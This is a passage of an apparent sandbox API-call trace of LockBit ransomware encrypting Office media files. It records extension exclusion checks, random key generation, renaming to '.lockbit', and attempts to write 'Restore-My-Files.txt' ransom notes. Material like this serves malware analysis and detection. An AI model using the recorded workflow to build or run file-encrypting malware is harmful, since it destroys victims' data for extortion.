0x753f0000 [0204.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.698] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.703] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.703] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.703] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.703] free (_Block=0x1fa2ed8) [0204.703] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.703] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.703] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c52600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x56c52600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21481_.GIF", cAlternateFileName="")) returned 1 [0204.703] lstrcmpiW (lpString1=".", lpString2="BD21481_.GIF") returned -1 [0204.703] lstrcmpiW (lpString1="..", lpString2="BD21481_.GIF") returned -1 [0204.703] PathFindExtensionW (pszPath="BD21481_.GIF") returned=".GIF" [0204.703] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.703] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.703] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.703] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.703] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.704] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.704] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21481_.GIF") returned 1 [0204.705] lstrcmpiW (lpString1="ntldr", lpString2="BD21481_.GIF") returned 1 [0204.705] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21481_.GIF") returned 1 [0204.705] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21481_.GIF") returned 1 [0204.705] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21481_.GIF") returned -1 [0204.705] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21481_.GIF") returned 1 [0204.705] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21481_.GIF") returned 1 [0204.705] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.705] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF") returned=".GIF" [0204.705] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.705] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.705] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.706] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.706] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.706] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF.lockbit") returned 78 [0204.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21481_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.708] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.708] malloc (_Size=0x40068) returned 0x3df0008 [0204.708] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=235) returned 1 [0204.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.709] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.723] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.723] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.723] free (_Block=0x1fa2ed8) [0204.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.723] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.723] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56c52600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x56c52600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21482_.GIF", cAlternateFileName="")) returned 1 [0204.723] lstrcmpiW (lpString1=".", lpString2="BD21482_.GIF") returned -1 [0204.723] lstrcmpiW (lpString1="..", lpString2="BD21482_.GIF") returned -1 [0204.723] PathFindExtensionW (pszPath="BD21482_.GIF") returned=".GIF" [0204.723] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.724] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.724] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.725] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21482_.GIF") returned 1 [0204.725] lstrcmpiW (lpString1="ntldr", lpString2="BD21482_.GIF") returned 1 [0204.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21482_.GIF") returned 1 [0204.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21482_.GIF") returned 1 [0204.725] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21482_.GIF") returned -1 [0204.725] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21482_.GIF") returned 1 [0204.725] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21482_.GIF") returned 1 [0204.725] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.726] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF") returned=".GIF" [0204.726] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.726] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.726] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.727] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.727] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF.lockbit") returned 78 [0204.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21482_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.729] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.729] malloc (_Size=0x40068) returned 0x3df0008 [0204.729] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=247) returned 1 [0204.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.730] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.735] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.735] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.735] free (_Block=0x1fa2ed8) [0204.735] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.735] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.735] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.735] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ffd9600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbced35e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8ffd9600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21503_.GIF", cAlternateFileName="")) returned 1 [0204.735] lstrcmpiW (lpString1=".", lpString2="BD21503_.GIF") returned -1 [0204.735] lstrcmpiW (lpString1="..", lpString2="BD21503_.GIF") returned -1 [0204.735] PathFindExtensionW (pszPath="BD21503_.GIF") returned=".GIF" [0204.735] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.735] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.735] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.735] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.735] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.735] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.735] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.736] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.736] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.737] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.737] lstrcmpiW 